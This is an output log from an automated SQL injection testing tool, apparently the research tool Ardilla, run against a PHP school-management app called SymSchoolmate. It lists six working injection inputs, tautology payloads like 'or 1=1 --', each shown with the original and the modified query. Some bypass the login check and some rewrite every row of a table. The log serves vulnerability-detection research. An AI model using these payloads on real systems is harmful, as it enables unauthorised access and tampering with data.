//START ATTACKS FOUND ------------------------------- /home/jars/eclipse-workspace/ardilla/experiments/subjectPrograms/SymSchoolmate/index.php vulnerability at line:3 in /home/jars/eclipse-workspace/ardilla/experiments/subjectPrograms/SymSchoolmate/ValidateLogin.php Input: apoint="1" bpoint="1" cpoint="1" dpoint="1" fpoint="1" infoupdate=1 login=1 logout=1 numperiods="1" numsemesters="1" page="1" page2=-1 password="1" schooladdress="1" schoolname="1" schoolphone="1" sitemessage="1" sitetext="1" username="junk" or 1=1 -- " NEW: select password from users where username = "junk" or 1=1 -- " ORIGINAL: select password from users where username = "1" ------------------------------- /home/jars/eclipse-workspace/ardilla/experiments/subjectPrograms/SymSchoolmate/index.php vulnerability at line:9 in /home/jars/eclipse-workspace/ardilla/experiments/subjectPrograms/SymSchoolmate/ClassSettings.php Input: infoupdate=-1 login=1 logout=-1 page="1" page2="1" password="teacher" selectclass="5 or 1=1 -- " username="teacher" NEW: SELECT aperc, bperc, cperc, dperc, coursename FROM courses WHERE courseid = 5 or 1=1 -- ORIGINAL: SELECT aperc, bperc, cperc, dperc, coursename FROM courses WHERE courseid = 1 ------------------------------- /home/jars/eclipse-workspace/ardilla/experiments/subjectPrograms/SymSchoolmate/index.php vulnerability at line:6 in /home/jars/eclipse-workspace/ardilla/experiments/subjectPrograms/SymSchoolmate/ClassSettings.php Input: infoupdate=-1 login=1 logout=-1 page="1" page2=1 password="teacher" selectclass="junk' or 1=1 -- " update="1" username="teacher" NEW: UPDATE courses SET aperc = '', bperc = '', cperc = '', dperc = '', fperc = '' WHERE courseid = 'junk' or 1=1 -- ' ORIGINAL: UPDATE courses SET aperc = '', bperc = '', cperc = '', dperc = '', fperc = '' WHERE courseid = '1' ------------------------------- /home/jars/eclipse-workspace/ardilla/experiments/subjectPrograms/SymSchoolmate/index.php vulnerability at line:9 in /home/jars/eclipse-workspace/ardilla/experiments/subjectPrograms/SymSchoolmate/ViewClassSettings.php Input: infoupdate=-1 login=1 logout=-1 page="1" page2="1" password="student" selectclass="5 or 1=1 -- " username="student" NEW: SELECT aperc, bperc, cperc, dperc, coursename FROM courses WHERE courseid = 5 or 1=1 -- ORIGINAL: SELECT aperc, bperc, cperc, dperc, coursename FROM courses WHERE courseid = 1 ------------------------------- /home/jars/eclipse-workspace/ardilla/experiments/subjectPrograms/SymSchoolmate/index.php vulnerability at line:6 in /home/jars/eclipse-workspace/ardilla/experiments/subjectPrograms/SymSchoolmate/ViewClassSettings.php Input: infoupdate=-1 login=1 logout=-1 page="1" page2=1 password="student" selectclass="junk' or 1=1 -- " update="1" username="student" NEW: UPDATE courses SET aperc = '', bperc = '', cperc = '', dperc = '', fperc = '' WHERE courseid = 'junk' or 1=1 -- ' ORIGINAL: UPDATE courses SET aperc = '', bperc = '', cperc = '', dperc = '', fperc = '' WHERE courseid = '1' ------------------------------- /home/jars/eclipse-workspace/ardilla/experiments/subjectPrograms/SymSchoolmate/index.php vulnerability at line:11 in /home/jars/eclipse-workspace/ardilla/experiments/subjectPrograms/SymSchoolmate/header.php Input: apoint="1" bpoint="1" cpoint="1" dpoint="1" fpoint="1" infoupdate=1 login=1 logout=1 numperiods="1" numsemesters="1" page="1" page2=-1 password="1" schooladdress="1" schoolname="junk" or 1=1 -- " schoolphone="1" sitemessage="1" sitetext="1" username="1" NEW: UPDATE schoolinfo SET schoolname = "junk" or 1=1 -- ", address = '1', phonenumber = '1', sitetext = '1', sitemessage = '1', numsemesters = '1', numperiods = '1', apoint = '1', bpoint = '1', cpoint = '1', dpoint = '1', fpoint = '1' where schoolname = 'MIT' LIMIT 1 ORIGINAL: UPDATE schoolinfo SET schoolname = "1", address = '1', phonenumber = '1', sitetext = '1', sitemessage = '1', numsemesters = '1', numperiods = '1', apoint = '1', bpoint = '1', cpoint = '1', dpoint = '1', fpoint = '1' where schoolname = 'MIT' LIMIT 1 //END ATTACKS FOUND no more inputs to explore attack count:6 coveredSQL:28 coveredTaintedSQL:23